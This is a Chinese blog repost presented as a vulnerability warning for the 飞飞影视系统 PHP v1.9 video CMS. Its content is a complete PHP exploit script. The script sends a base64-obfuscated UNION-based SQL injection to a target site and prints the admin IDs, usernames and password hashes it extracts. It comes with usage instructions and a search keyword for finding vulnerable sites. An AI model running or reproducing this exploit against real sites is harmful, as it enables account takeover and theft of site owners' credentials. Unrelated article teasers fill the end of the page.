飞飞影视系统PHP版 v1.9 injection exploit漏洞预警 -电脑资料

文章作者:honglousy

昨天整的 论坛旁站上的程序,发现用的人还真不少,

飞飞影视系统PHP版 v1.9 injection exploit漏洞预警

简单的写了个exp。无聊之作...

<?php

/**

*飞飞影视管理系统 SQL injection

*飞飞影视系统PHP版 v1.9 injection exploit

*by:www.08sec.com fans

*keyword "Powered bywww.ff84.com"

*/

error_reporting(E_ERROR);

set_time_limit(0);

if ($argc<3) {

print_r('

------------------------------------------------------

Usage: php '.$argv[0].' host path

host: target server (ip/hostname),without"http://"

path: path to ff84cms

Example:

php '.$argv[0].' localhost /

-------------------------------------------------------

');

die;

}

$host=$argv[1];

$path=$argv[2];

$html='';

$cookie="";

$agent=" User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1";

$content ="";

$data = "POST /?s=vod-read-id-1".base64_decode('JTIwYW5kJTIwMT0yJTIwdW5pb24lMjBzZWxlY3QlMjAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNixjb25jYXQoMHg0MCxhZG1pbl9pZCwweDQwLGFkbWluX25hbWUsMHg0MCxhZG1pbl9wd2QsMHg0MCksMjgsMjklMjBmcm9tJTIwcHBfYWRtaW4tLQ==')."html HTTP/1.1\r\n";

$data .= "Host: ".$host."\r\n";

//$data .="Cookie: ".$cookie."\r\n";

$data .= "User-Agent: ".$agent. "\r\n";

$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";

$data .= "Accept-Encoding: gzip,deflate\r\n";

$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";

$data .= "Connection: keep-alive\r\n";

$data .= "Content-Type: application/x-www-form-urlencoded\r\n";

$data .= "Content-Length: ".strlen($content)."\r\n\r\n";

$data .= $content."\r\n";

Sendpack($data);

if (!eregi("Tpl",$html)){

// echo $packet."\r\n";

// echo $html."\r\n";

die("Exploit failed...");

}else{

$pattern="/@(.*)@/i";

preg_match($pattern,$html,$pg);

echo "$pg[1]\r\n\r\n

";

echo "\r\nExploit succeeded...\r\n";

}

Function sendpack ($packet)

{

global$host, $html;

$ock=fsockopen(gethostbyname($host),'80');

if (!$ock) {

echo 'No response from '.$host; die;

}

fputs($ock,$packet);

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

fclose($ock);

}

相关文章

人为什么会自杀? -管理资料

现在,心理学家们试图解释人为什么会自杀这一宽泛的问题,人为什么会自杀?。如果这种解释可以成立,它将给精神病学家提供一种筛选病人的新工具,帮助确定哪些病人更可能自杀,从而预防、挽救生命。 难以解释的动...
资料大全2014-06-02
人为什么会自杀? -管理资料

森林防火倡议书

在日常生活和工作中,越来越多人会去使用倡议书,在写作上,倡议书有一定的书写规范。你所见过的倡议书是什么样的呢?下面是小编精心整理的森林防火倡议书6篇,仅供参考,欢迎大家阅读。森林防火倡议书 篇1森林资...
资料大全2017-03-01
森林防火倡议书

全国计算机等级考试共有几个等级

全国计算机等级考试是经原国家教育委员会(现教育部)批准,由教育部考试中心主办,面向社会,用于考查应试人员计算机应用知识与技能的全国性计算机水平考试体系。有人会问,全国计算机等级考试共有几等级?接下来,...
资料大全2012-05-03
全国计算机等级考试共有几个等级

离职短信

今天是正月十一,应该回复了。下午带着孩子,在儿童乐园转了一圈。孩子在旁边玩儿,我坐在木凳上,思绪万千,还是发短信吧,不打电话了,免得都很激动。几经修改,发出下面的短信。“某某您好,请恕我无法继续这里的...
资料大全2019-02-08
离职短信

公司会主持人开场白台词

公司2017年会主持人开场白台词尊敬的各位领导、亲爱的各位来宾、各位朋友大家晚上好!(女) 今晚我们--公司的全体同仁在这里欢聚一堂,喜庆昨日的辉煌业绩,展望 公司的美好未来!(男) 回首往昔,兔年对...
资料大全2013-03-04
公司会主持人开场白台词

酒店员工管理制度(示范文本)(4)

3. 钥匙不得转借他人,违者罚款50元。4. 倒班时,应先将钥匙交给领班,安排专人**。5. 不能遗失钥匙,开门给无关人员进入房间,违者罚款50元。房间小酒吧管理办法房间小酒吧是一种方便客人的服务设施...
资料大全2019-03-05
酒店员工管理制度(示范文本)(4)